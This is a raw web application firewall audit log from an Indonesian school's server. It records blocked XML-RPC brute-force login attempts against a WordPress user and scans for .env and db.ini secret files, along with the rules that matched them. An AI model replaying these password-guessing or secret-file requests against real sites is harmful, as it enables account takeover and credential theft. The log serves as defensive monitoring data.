--55cec335-Z-- --bbb17b67-A-- [19/Apr/2025:23:53:53 +0700] aAPVIevDiFC_ir7MDwZU_AAAAFg 103.236.140.4 45952 103.236.140.4 8181 --bbb17b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bbb17b67-C-- wp.getUsersBlogs kesiswaan verystrong --bbb17b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbb17b67-E-- --bbb17b67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081633313442 5167 (- - -) Stopwatch2: 1745081633313442 5167; combined=4024, p1=484, p2=3325, p3=0, p4=0, p5=123, sr=86, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbb17b67-Z-- --b5ad7d1a-A-- [19/Apr/2025:23:54:53 +0700] aAPVXUruoUXZj665VUF01gAAANc 103.236.140.4 46256 103.236.140.4 8181 --b5ad7d1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b5ad7d1a-C-- wp.getUsersBlogs kesiswaan P@SSWORD --b5ad7d1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ad7d1a-E-- --b5ad7d1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081693326338 5694 (- - -) Stopwatch2: 1745081693326338 5694; combined=3879, p1=475, p2=3233, p3=0, p4=0, p5=100, sr=86, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ad7d1a-Z-- --fefadc09-A-- [19/Apr/2025:23:55:56 +0700] aAPVnA6cTFSgLAHl7PpQ2QAAABE 103.236.140.4 46568 103.236.140.4 8181 --fefadc09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fefadc09-C-- wp.getUsersBlogs kesiswaan asdfghjkl --fefadc09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fefadc09-E-- --fefadc09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081756834471 5035 (- - -) Stopwatch2: 1745081756834471 5035; combined=3924, p1=460, p2=3294, p3=0, p4=0, p5=100, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fefadc09-Z-- --698b4020-A-- [19/Apr/2025:23:56:59 +0700] aAPV2w6cTFSgLAHl7PpQ-AAAAAo 103.236.140.4 46880 103.236.140.4 8181 --698b4020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --698b4020-C-- wp.getUsersBlogs kesiswaan qqq --698b4020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --698b4020-E-- --698b4020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081819355313 5632 (- - -) Stopwatch2: 1745081819355313 5632; combined=4003, p1=492, p2=3389, p3=0, p4=0, p5=72, sr=86, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --698b4020-Z-- --b3ae1662-A-- [19/Apr/2025:23:58:01 +0700] aAPWGevDiFC_ir7MDwZVSwAAAEg 103.236.140.4 47188 103.236.140.4 8181 --b3ae1662-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b3ae1662-C-- wp.getUsersBlogs kesiswaan caonima123 --b3ae1662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3ae1662-E-- --b3ae1662-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081881367565 5798 (- - -) Stopwatch2: 1745081881367565 5798; combined=4067, p1=512, p2=3376, p3=0, p4=0, p5=105, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3ae1662-Z-- --8d648975-A-- [19/Apr/2025:23:59:01 +0700] aAPWVUruoUXZj665VUF1JQAAANE 103.236.140.4 47474 103.236.140.4 8181 --8d648975-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d648975-C-- wp.getUsersBlogs kesiswaan aaaaa --8d648975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d648975-E-- --8d648975-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081941174561 5442 (- - -) Stopwatch2: 1745081941174561 5442; combined=3739, p1=483, p2=3095, p3=0, p4=0, p5=95, sr=89, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d648975-Z-- --1ac56b2e-A-- [20/Apr/2025:00:00:01 +0700] aAPWkUruoUXZj665VUF1QAAAAMY 103.236.140.4 47776 103.236.140.4 8181 --1ac56b2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1ac56b2e-C-- wp.getUsersBlogs kesiswaan admin!@# --1ac56b2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ac56b2e-E-- --1ac56b2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745082001787148 5484 (- - -) Stopwatch2: 1745082001787148 5484; combined=4122, p1=459, p2=3310, p3=0, p4=0, p5=191, sr=86, sw=162, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ac56b2e-Z-- --0b4ac10b-A-- [20/Apr/2025:00:03:54 +0700] aAPXenNa4dA2HllpK_PqRQAAAIE 103.236.140.4 48684 103.236.140.4 8181 --0b4ac10b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --0b4ac10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b4ac10b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745082234035165 731 (- - -) Stopwatch2: 1745082234035165 731; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b4ac10b-Z-- --80fd7b65-A-- [20/Apr/2025:00:23:44 +0700] aAPcIHNa4dA2HllpK_PrXgAAAIQ 103.236.140.4 53284 103.236.140.4 8181 --80fd7b65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --80fd7b65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80fd7b65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083424799742 850 (- - -) Stopwatch2: 1745083424799742 850; combined=388, p1=284, p2=0, p3=0, p4=0, p5=104, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80fd7b65-Z-- --72f9a80b-A-- [20/Apr/2025:00:23:44 +0700] aAPcIEruoUXZj665VUF2zAAAANg 103.236.140.4 53290 103.236.140.4 8181 --72f9a80b-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --72f9a80b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f9a80b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083424968775 758 (- - -) Stopwatch2: 1745083424968775 758; combined=289, p1=240, p2=0, p3=0, p4=0, p5=48, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f9a80b-Z-- --2d4e550b-A-- [20/Apr/2025:00:23:45 +0700] aAPcIUruoUXZj665VUF2zQAAAMI 103.236.140.4 53292 103.236.140.4 8181 --2d4e550b-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2d4e550b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d4e550b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083425137956 749 (- - -) Stopwatch2: 1745083425137956 749; combined=292, p1=256, p2=0, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d4e550b-Z-- --8a0cc222-A-- [20/Apr/2025:00:23:45 +0700] aAPcIQ6cTFSgLAHl7PpSvAAAAAY 103.236.140.4 53294 103.236.140.4 8181 --8a0cc222-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8a0cc222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a0cc222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083425306698 650 (- - -) Stopwatch2: 1745083425306698 650; combined=276, p1=231, p2=0, p3=0, p4=0, p5=45, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a0cc222-Z-- --36f25840-A-- [20/Apr/2025:00:23:45 +0700] aAPcIUruoUXZj665VUF2zgAAANM 103.236.140.4 53296 103.236.140.4 8181 --36f25840-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --36f25840-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f25840-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083425493933 712 (- - -) Stopwatch2: 1745083425493933 712; combined=260, p1=213, p2=0, p3=0, p4=0, p5=47, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f25840-Z-- --e9b52b55-A-- [20/Apr/2025:00:23:46 +0700] aAPcIkruoUXZj665VUF20wAAAM8 103.236.140.4 53312 103.236.140.4 8181 --e9b52b55-B-- GET /db.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e9b52b55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9b52b55-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745083426666433 1601 (- - -) Stopwatch2: 1745083426666433 1601; combined=692, p1=297, p2=356, p3=0, p4=0, p5=39, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9b52b55-Z-- --a8c5bb4e-A-- [20/Apr/2025:00:23:48 +0700] aAPcJHNa4dA2HllpK_PrYQAAAI0 103.236.140.4 53344 103.236.140.4 8181 --a8c5bb4e-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a8c5bb4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8c5bb4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083428948117 610 (- - -) Stopwatch2: 1745083428948117 610; combined=269, p1=246, p2=0, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8c5bb4e-Z-- --712c864c-A-- [20/Apr/2025:00:36:00 +0700] aAPfAOvDiFC_ir7MDwZYcwAAAE0 103.236.140.4 60982 103.236.140.4 8181 --712c864c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 Accept-Charset: utf-8 --712c864c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --712c864c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745084160882609 763 (- - -) Stopwatch2: 1745084160882609 763; combined=327, p1=286, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --712c864c-Z-- --db9bd134-A-- [20/Apr/2025:00:52:03 +0700] aAPiw0ruoUXZj665VUF8_QAAAMM 103.236.140.4 51348 103.236.140.4 8181 --db9bd134-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --db9bd134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db9bd134-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745085123204861 843 (- - -) Stopwatch2: 1745085123204861 843; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db9bd134-Z-- --222de964-A-- [20/Apr/2025:02:06:57 +0700] aAP0UevDiFC_ir7MDwZh6gAAAEY 103.236.140.4 41928 103.236.140.4 8181 --222de964-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.10 Safari/537.36 Edg/77.0.235.5 Accept-Charset: utf-8 --222de964-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --222de964-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745089617901802 750 (- - -) Stopwatch2: 1745089617901802 750; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=74, 